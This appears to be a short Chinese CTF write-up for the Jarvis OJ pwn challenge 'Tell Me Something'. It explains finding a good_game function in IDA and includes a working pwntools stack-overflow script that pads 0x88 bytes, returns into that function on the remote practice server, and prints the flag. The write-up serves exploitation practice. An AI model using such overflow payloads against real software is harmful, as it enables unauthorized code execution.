Jarvis OJ-PWN-Tell Me Something wp
开启了NX保护 说明栈中数据没有执行权限
Jarvis OJ-PWN-Tell Me Something wp
拖到IDA里看一下
Jarvis OJ-PWN-Tell Me Something wp
通过观察IDA左侧的函数栏可以看到一个good_game函数
点进去观察
Jarvis OJ-PWN-Tell Me Something wp
我们看到了flag.txt 可以想到flag应该就在这个txt文档里
于是我们就可以让溢出的返回地址为good_game函数
通过cyclic或者IDA来获取长度

from pwn import *

#p=process("./guestbook")

con=remote("pwn.jarvisoj.com","9876")
e=ELF("./guestbook")
con.recvline()
game_addr=e.symbols["good_game"]
payload="a"*0x88+p64(game_addr)

con.sendline(payload)
con.recvline()
con.interactive()

PCTF{This_is_J4st_Begin}

相关文章:

  • 2022-12-23
  • 2021-04-27
  • 2021-08-18
  • 2022-12-23
  • 2021-11-04
  • 2021-12-29
  • 2022-12-23
  • 2022-01-17
猜你喜欢
  • 2022-12-23
  • 2021-09-29
  • 2021-06-28
  • 2021-08-25
  • 2021-07-11
  • 2021-11-03
  • 2021-06-04
相关资源
相似解决方案